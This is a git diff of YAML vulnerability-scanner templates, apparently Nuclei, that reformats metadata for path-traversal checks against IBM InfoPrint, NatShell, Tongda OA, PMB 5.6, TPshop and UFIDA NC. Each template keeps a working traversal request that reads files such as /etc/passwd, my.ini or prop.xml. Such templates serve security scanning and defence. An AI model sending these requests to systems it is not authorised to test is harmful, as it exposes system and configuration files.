severity: medium
- description: IBM InfoPrint 4247-Z03 Impact Matrix Printer is subject to local file inclusion.
- reference:
- - https://www.exploit-db.com/exploits/47835
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cwe-id: CWE-22
+ description: Directory traversal vulnerability on IBM InfoPrint 4247-Z03 Impact Matrix Printer.
+ reference: https://www.exploit-db.com/exploits/47835
tags: ibm,lfi,matrix,printer
requests:
- method: GET
@@ -24,5 +19,3 @@ requests:
regex:
- "root:.*:0:0:"
part: body
-
-# Enhanced by mp on 2022/07/22
diff --git a/poc/directory_listing/natshell-path-traversal.yaml b/poc/directory_listing/natshell-path-traversal.yaml
index 9dd202e3ec..391bb848a2 100644
--- a/poc/directory_listing/natshell-path-traversal.yaml
+++ b/poc/directory_listing/natshell-path-traversal.yaml
@@ -1,29 +1,24 @@
id: natshell-path-traversal
+
info:
- name: NatShell - Local File Inclusion
+ name: NatShell Path Traversal
author: pikpikcu
severity: high
- description: NatShell is vulnerable to local file inclusion.
- reference:
- - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cwe-id: CWE-22
- metadata:
- fofa-query: title="蓝海卓越计费管理系统"
+ reference: https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw
tags: natshell,lfi
+
requests:
- method: GET
path:
- "{{BaseURL}}/download.php?file=../../../../../etc/passwd"
+
matchers-condition: and
matchers:
+
- type: regex
regex:
- "toor:[x*]:0:0"
+
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/07/27
diff --git a/poc/directory_listing/oa-tongda-path-traversal-9177.yaml b/poc/directory_listing/oa-tongda-path-traversal-9177.yaml
index a5d4aa6dfc..56aa950f64 100644
--- a/poc/directory_listing/oa-tongda-path-traversal-9177.yaml
+++ b/poc/directory_listing/oa-tongda-path-traversal-9177.yaml
@@ -1,11 +1,12 @@
id: oa-tongda-path-traversal
+
info:
name: OA TongDa Path Traversal
author: pikpikcu
severity: critical
- reference:
- - https://github.com/jas502n/OA-tongda-RCE
+ reference: https://github.com/jas502n/OA-tongda-RCE
tags: tongda,lfi
+
requests:
- raw:
- |
@@ -14,6 +15,7 @@ requests:
Content-Type: application/x-www-form-urlencoded
json={"url":"/general/../../mysql5/my.ini"}
+
matchers-condition: and
matchers:
- type: word
diff --git a/poc/directory_listing/pmb-directory-traversal.yaml b/poc/directory_listing/pmb-directory-traversal.yaml
index 8c9f04c593..8770d69cab 100644
--- a/poc/directory_listing/pmb-directory-traversal.yaml
+++ b/poc/directory_listing/pmb-directory-traversal.yaml
@@ -1,23 +1,22 @@
id: pmb-directory-traversal
+
info:
- name: PMB 5.6 - Arbitrary File Retrieval
+ name: PMB 5.6 Directory Traversal
+ reference: https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html
author: geeknik
severity: medium
- description: The PMB Gif Image is not sanitizing the content of the 'chemin' parameter, wchi can be used for local file retrieval.
- reference:
- - https://packetstormsecurity.com/files/160072/PMB-5.6-Local-File-Disclosure-Directory-Traversal.html
- tags: lfi
+
requests:
- method: GET
path:
- "{{BaseURL}}/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik"
- "{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=tarik"
- stop-at-first-match: true
+
matchers-condition: and
matchers:
- type: regex
regex:
- - "root:.*:0:0:"
+ - "root:[x*]:0:0:"
- type: status
status:
- 200
diff --git a/poc/directory_listing/tpshop-directory-traversal.yaml b/poc/directory_listing/tpshop-directory-traversal.yaml
index 7f794cefeb..47af9e5038 100644
--- a/poc/directory_listing/tpshop-directory-traversal.yaml
+++ b/poc/directory_listing/tpshop-directory-traversal.yaml
@@ -1,27 +1,24 @@
id: tpshop-directory-traversal
+
info:
- name: TPshop - Local File Inclusion
+ name: TPshop Directory Traversal
author: pikpikcu
- description: TPshop is vulnerable to local file inclusion.
severity: high
- reference:
- - https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cwe-id: CWE-22
+ reference: https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA
tags: tpshop,lfi
+
requests:
- method: GET
path:
- "{{BaseURL}}/index.php/Home/uploadify/fileList?type=.+&path=../../../"
+
matchers-condition: and
matchers:
+
- type: word
words:
- '"state":"SUCCESS"'
+
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/08/04
diff --git a/poc/directory_listing/wooyun-path-traversal.yaml b/poc/directory_listing/wooyun-path-traversal.yaml
index 515f1293b5..bb0ba90489 100644
--- a/poc/directory_listing/wooyun-path-traversal.yaml
+++ b/poc/directory_listing/wooyun-path-traversal.yaml
@@ -1,21 +1,21 @@
id: wooyun-path-traversal
-
info:
- name: Wooyun Path Traversal
+ name: Wooyun - Local File Inclusion
author: pikpikcu
severity: high
- reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
description: |
- A general document of UFIDA ERP-NC contains a vulnerability
- (affecting a large number of well-known school government and enterprise cases
- such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo)
- tags: lfi
-
+ Wooyun is vulnerable to local file inclusion.
+ reference:
+ - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cwe-id: CWE-22
+ tags: lfi,wooyun
requests:
- method: GET
path:
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml"
-
matchers-condition: and
matchers:
- type: status
@@ -26,4 +26,6 @@ requests:
-